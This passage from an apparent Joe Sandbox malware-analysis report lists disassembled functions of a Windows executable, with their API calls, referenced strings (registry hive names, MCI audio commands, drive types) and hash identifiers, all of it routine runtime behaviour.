VariantInit.OLEAUT32(?), ref: 004788D7
CoInitialize.OLE32(00000000), ref: 00478904
CoUninitialize.OLE32 ref: 0047890E
GetRunningObjectTable.OLE32(00000000,?), ref: 00478A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00478B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00492C0C), ref: 00478B6F
CoGetObject.OLE32(?,00000000,00492C0C,?), ref: 00478B92
SetErrorMode.KERNEL32(00000000), ref: 00478BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00478C25
VariantClear.OLEAUT32(?), ref: 00478C35

Strings

,,I, xrefs: 004788C1

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID: ,,I
API String ID: 2395222682-4163367948
Opcode ID: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
Instruction ID: aabbb54c80bb5556d5779205c7c98f5c8569651e4766cb9ae3be61758569f7e0
Opcode Fuzzy Hash: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
Instruction Fuzzy Hash: 33C138B1604305AFC700DF25C88896BB7E9FF89348F00896EF9899B251DB75ED05CB56

Function 00480E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31

Strings

HKEY_LOCAL_MACHINE, xrefs: 00480E9A
HKCC, xrefs: 00480EFF
HKCR, xrefs: 00480ED9
HKEY_CLASSES_ROOT, xrefs: 00480EC4
HKEY_CURRENT_CONFIG, xrefs: 00480EEE
HKLM, xrefs: 00480EAF
HKEY_USERS, xrefs: 00480F32
HKCU, xrefs: 00480F21
HKEY_CURRENT_USER, xrefs: 00480F10
HKU, xrefs: 00480F43

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 8d3f5457614a560b38f905c17fe191cbfe4d6e9b901594d3939f7eaaff082135
Instruction ID: 987af29362f030b9785e67816bde092fa47ad23058dcaf1b7a905610e89cab94
Opcode Fuzzy Hash: 8d3f5457614a560b38f905c17fe191cbfe4d6e9b901594d3939f7eaaff082135
Instruction Fuzzy Hash: 3C4183312142598BCF60FF11D891AEF3760AF21308F94882BFE5517292D77C9D1ACB69

Function 004652C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

Part of subcall function 00407924: _memmove.LIBCMT ref: 004079AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00465330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00465346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00465357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00465369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0046537A

Strings

play PlayMe wait, xrefs: 00465364
open , xrefs: 004652DF
status PlayMe mode, xrefs: 0046532B
alias PlayMe, xrefs: 00465309
play PlayMe, xrefs: 00465375
close PlayMe, xrefs: 00465341, 0046536E

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
Instruction ID: 2e8e5f898991f968bbba2f693440f846553d5b5edaf37d24830f39f112612e90
Opcode Fuzzy Hash: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
Instruction Fuzzy Hash: CE119370D5015979D720B662CC49EFF7B7CEB91B48F10042F7801A21D1EDB81D45C6BA

Function 004646B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 004646D2
gethostname.WSOCK32(?,00000100), ref: 004646EC
gethostbyname.WSOCK32(?), ref: 004646F9
_wcscpy.LIBCMT ref: 00464721
_memmove.LIBCMT ref: 00464734
inet_ntoa.WSOCK32(?), ref: 0046473F
_strcat.LIBCMT ref: 0046474D
_wcscpy.LIBCMT ref: 00464764
WSACleanup.WSOCK32 ref: 00464772
_wcscpy.LIBCMT ref: 00464780

Strings

0.0.0.0, xrefs: 0046471B

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 5b309dc600144d10cd4df96da033064f68b25cba8dfa7e2b119ea905bdd96dc3
Instruction ID: ae08325a14d93a890b1fa528d308863361f072a57d3f479d6846efdaae1a579c
Opcode Fuzzy Hash: 5b309dc600144d10cd4df96da033064f68b25cba8dfa7e2b119ea905bdd96dc3
Instruction Fuzzy Hash: BD11F331600114AFDB10AB70AC46EDE77ACEB41716F5405BFF44592191FF7889858B5A

Function 00464F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00464F7A

Part of subcall function 0042049F: timeGetTime.WINMM(?,7694B400,00410E7B), ref: 004204A3

Sleep.KERNEL32(0000000A), ref: 00464FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00464FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00464FEC
SetActiveWindow.USER32 ref: 0046500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00465019
SendMessageW.USER32(00000010,00000000,00000000), ref: 00465038
Sleep.KERNEL32(000000FA), ref: 00465043
IsWindow.USER32 ref: 0046504F
EndDialog.USER32(00000000), ref: 00465060

Strings

BUTTON, xrefs: 00464FDE

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
Instruction ID: 17ca608856519cd1955488b4f204772d3e00e2da9bda675b1abbe090807247ff
Opcode Fuzzy Hash: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
Instruction Fuzzy Hash: A521A174200605BFEB505F60FC88F2A3BA9EB44749F25543EF102922B1EB758D549B6F

Function 0046D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

CoInitialize.OLE32(00000000), ref: 0046D5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0046D67D
SHGetDesktopFolder.SHELL32(?), ref: 0046D691
CoCreateInstance.OLE32(00492D7C,00000000,00000001,004B8C1C,?), ref: 0046D6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0046D74C
CoTaskMemFree.OLE32(?,?), ref: 0046D7A4
_memset.LIBCMT ref: 0046D7E1
SHBrowseForFolderW.SHELL32(?), ref: 0046D81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0046D840
CoTaskMemFree.OLE32(00000000), ref: 0046D847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0046D87E
CoUninitialize.OLE32(00000001,00000000), ref: 0046D880

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: d199858874c66e9e4f3753e20070a5963f56ec606f14660cdbbc09dbb01e0176
Instruction ID: f865a34610966cb3ccb6f29414af5a3955dc884533e4df89e7e1a7976a3b9bcc
Opcode Fuzzy Hash: d199858874c66e9e4f3753e20070a5963f56ec606f14660cdbbc09dbb01e0176
Instruction Fuzzy Hash: 39B11B75A00109AFDB04DFA5C888DAEBBB9FF48314F10846AF909EB261DB34ED45CB55

Function 0045C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0045C283
GetWindowRect.USER32(00000000,?), ref: 0045C295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0045C2F3
GetDlgItem.USER32(?,00000002), ref: 0045C2FE
GetWindowRect.USER32(00000000,?), ref: 0045C310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0045C364
GetDlgItem.USER32(?,000003E9), ref: 0045C372
GetWindowRect.USER32(00000000,?), ref: 0045C383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0045C3C6
GetDlgItem.USER32(?,000003EA), ref: 0045C3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0045C3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 0045C3FE

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
Instruction ID: 11649da17df5d0755d73b9da25d5b781727aa351e01af551b5c423be9c7c6dfa
Opcode Fuzzy Hash: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
Instruction Fuzzy Hash: 62517071B00305AFDB08CFA9DD89AAEBBB6EB88311F14853DF915E7291D7709D448B14

Function 0040201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004020D3
KillTimer.USER32(-00000001,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0040216E
DestroyAcceleratorTable.USER32(00000000), ref: 0043BCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BD0A
DeleteObject.GDI32(00000000), ref: 0043BD1C

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
Instruction ID: edfb5b42e1aee2da2af7767ce8276f4fdeab99f29820ea46fc720bac3244b47a
Opcode Fuzzy Hash: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
Instruction Fuzzy Hash: B0617E34101B10DFD735AF14CA48B2A77F1FB44316F50943EE642AAAE0C7B8A891DB99

Function 004021A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC

GetSysColor.USER32(0000000F), ref: 004021D3

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
Instruction ID: b625a7fc61febfd2c935065ad26fa2a4911c749eaed189314b0e0014d1ee1d2c
Opcode Fuzzy Hash: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
Instruction Fuzzy Hash: 0B41E531000100EFDB215F68DC8CBBA3B65EB46331F1442BAFE619A2E1C7758C86DB69

Function 0046A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,0048F910), ref: 0046A90B
GetDriveTypeW.KERNEL32(00000061,004B89A0,00000061), ref: 0046A9D5
_wcscpy.LIBCMT ref: 0046A9FF

Strings

cdrom, xrefs: 0046A927
unknown, xrefs: 0046A996
ramdisk, xrefs: 0046A97F
network, xrefs: 0046A969
removable, xrefs: 0046A93D
fixed, xrefs: 0046A953
all, xrefs: 0046A911

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
Instruction ID: 63d5a068ad5a56aba220708db6a6aa365c702eef260e2cf9077a2f95fd26ae7a
Opcode Fuzzy Hash: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
Instruction Fuzzy Hash: 6751AE711183009BC700EF15C892AAFB7E5EF94308F544C2FF495672A2EB399D19CA5B

Function 00487152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0048716A
CreateMenu.USER32 ref: 00487185
SetMenu.USER32(?,00000000), ref: 00487194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487221
IsMenu.USER32(?), ref: 00487237
CreatePopupMenu.USER32 ref: 00487241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0048726E
DrawMenuBar.USER32 ref: 00487276

Strings

0, xrefs: 00487160
F, xrefs: 00487262

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
Instruction ID: ef621a00a8965f8f9a50d7f8a7e1c0e3a51c02c5d80a3ac9dc969039337b3b35
Opcode Fuzzy Hash: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
Instruction Fuzzy Hash: 2A419B74A01204EFDB10EF64D898E9E7BB5FF09300F240469F915A7361D735A910DF98

Function 004874BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0048755E
CreateCompatibleDC.GDI32(00000000), ref: 00487565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00487578
SelectObject.GDI32(00000000,00000000), ref: 00487580
GetPixel.GDI32(00000000,00000000,00000000), ref: 0048758B
DeleteDC.GDI32(00000000), ref: 00487594
GetWindowLongW.USER32(?,000000EC), ref: 0048759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004875B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004875BE

Strings

static, xrefs: 004874F6

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
Instruction ID: 1923f87f84a105141cc97cd4dfb73f9ea5de9f9edaf5dec82e4c1ac095da0f9d
Opcode Fuzzy Hash: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
Instruction Fuzzy Hash: FA316D72104214BBDF11AF64DC08FDF3BA9FF09364F210A29FA15A61A0D739D815DBA8

Function 00426E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00426E3E

Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28

__gmtime64_s.LIBCMT ref: 00426ED7
__gmtime64_s.LIBCMT ref: 00426F0D
__gmtime64_s.LIBCMT ref: 00426F2A
__allrem.LIBCMT ref: 00426F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426F9C
__allrem.LIBCMT ref: 00426FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426FD1
__allrem.LIBCMT ref: 00426FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00427006
__invoke_watson.LIBCMT ref: 00427077

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: cc18d51bddcb3bff235d9ba930da6ebb912618c2495e950f743dda1aeb2a8d13
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: F8710876B00726ABD714AF79EC41B5BB3A4AF04328F55412FF514D7281EB78ED048B98

Function 00462527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00462542
GetMenuItemInfoW.USER32(004C5890,000000FF,00000000,00000030), ref: 004625A3
SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 004625D9
Sleep.KERNEL32(000001F4), ref: 004625EB
GetMenuItemCount.USER32(?), ref: 0046262F
